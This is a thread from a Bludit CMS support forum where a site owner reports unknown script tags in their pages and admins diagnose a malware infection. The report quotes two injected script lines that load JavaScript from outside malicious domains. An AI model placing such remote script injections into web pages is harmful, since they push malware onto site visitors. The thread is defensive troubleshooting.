Strange code

Post Reply
User avatar
LRAM
Master Bludit
Posts: 199
Joined: Sat Sep 24, 2016 4:02 pm
Location: France
Has thanked: 22 times
Been thanked: 2 times
Contact:

Hi

When in source mode I saw this code on some of my pages

4 times on the same page

Code: Select all

<script type="text/javascript" async="" src="//domclickext.xyz/212b3d4039ab5319ec.js"></script>
Is that part of Bludit ?
https://sucrepop.com
Candies for the ears
User avatar
LRAM
Master Bludit
Posts: 199
Joined: Sat Sep 24, 2016 4:02 pm
Location: France
Has thanked: 22 times
Been thanked: 2 times
Contact:

and this one on another one

Code: Select all

<script type="text/javascript" async="" src="//linkojager.org/212b3d4039ab5319ec.js"></script>
https://sucrepop.com
Candies for the ears
User avatar
Edi
Site Admin
Posts: 3121
Joined: Sun Aug 09, 2015 5:01 pm
Location: Zurich
Has thanked: 54 times
Been thanked: 77 times
Contact:

No, this is no Bludit code.

Seems that the sites are hacked.

Perhaps there is some information in the server logs.
Clickwork - Websites mit Bludit | Planet Bludit - Tipps und Snippets
User avatar
abdulhalim
Master Bludit
Posts: 128
Joined: Thu Mar 10, 2016 6:25 pm
Location: Bandar Abbas
Been thanked: 4 times
Contact:

You have to scan your website and remove all the unwanted JS links.

https://sitecheck.sucuri.net/results/ht ... and-me.com

Your website is infected by malware...

Also, you need to replace all Bludit files with the new and clean version.
User avatar
Edi
Site Admin
Posts: 3121
Joined: Sun Aug 09, 2015 5:01 pm
Location: Zurich
Has thanked: 54 times
Been thanked: 77 times
Contact:

Could be that your PC is infected, and your password can be used.
Clickwork - Websites mit Bludit | Planet Bludit - Tipps und Snippets
User avatar
diego
Site Admin
Posts: 773
Joined: Sat May 16, 2015 2:53 pm
Been thanked: 1 time
Contact:

Hi,
it's a pitty this happens.

There are a few people trying to hack Bludit, but I never saw a vulnerability from outside of the system, also if there is one for sure they will hack a lot of Bludit installations, so the point from malware from your computer could be.

Do you have access to the server via SSH or something like that ? to search in all the pages for javascript and remove it.
User avatar
diego
Site Admin
Posts: 773
Joined: Sat May 16, 2015 2:53 pm
Been thanked: 1 time
Contact:

I found information about this malware.

https://malwaretips.com/blogs/remove-domclickext-xyz/

You can check on Google also.
User avatar
LRAM
Master Bludit
Posts: 199
Joined: Sat Sep 24, 2016 4:02 pm
Location: France
Has thanked: 22 times
Been thanked: 2 times
Contact:

Hi
Well it's seems some Chrome Extention add this vulnerabilty
I think I've clean everything now
thanks
https://sucrepop.com
Candies for the ears
User avatar
Edi
Site Admin
Posts: 3121
Joined: Sun Aug 09, 2015 5:01 pm
Location: Zurich
Has thanked: 54 times
Been thanked: 77 times
Contact:

Which extension is it?
Clickwork - Websites mit Bludit | Planet Bludit - Tipps und Snippets
Post Reply